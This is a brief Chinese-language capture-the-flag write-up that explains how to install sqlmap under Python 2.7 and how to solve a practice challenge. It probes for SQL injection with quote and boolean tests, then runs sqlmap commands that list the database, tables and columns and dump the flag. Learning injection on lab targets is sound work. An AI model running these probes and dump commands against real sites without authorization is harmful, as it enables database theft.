一、sqlmap安装

windows平台，需安装python2版本（一般是2.7或2.8，3.5版本的不支持sqlmap）

SqlMap下载地址：sqlmap下载可下载到最新版本的SqlMap；

Python下载地址：python2.7可下载到相应的Python.建议下载2.7或者2.8版本的python，配合1中的sqlmap

安装完成后，进入sqlmap的安装目录，输入命令，查看安装版本，若正确安装，则会显示1.2.7.4#dev

D:\Python27\python.exe sqlmap.py --version

因为我电脑默认安装的python是3.5版本的，所以这里调用sqlmap需要指定python的安装路径。

二、sqlmap使用

题目：http://www.shiyanbar.com/ctf/33

这题主要是学习sqlmap的使用。

首先判断有没有sql注入

1.在网址后加' ,报错

2.在网址后加and 1=1,无报错

3.在网址后加and1=2,有报错，判断有sql注入

然后使用sqlmap来查看数据库信息

1.D:\Python27\python.exe sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --current-db

2.D:\Python27\python.exe sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables

3.D:\Python27\python.exe sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --column

4.D:\Python27\python.exe sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump

解出flag:whatiMyD91dump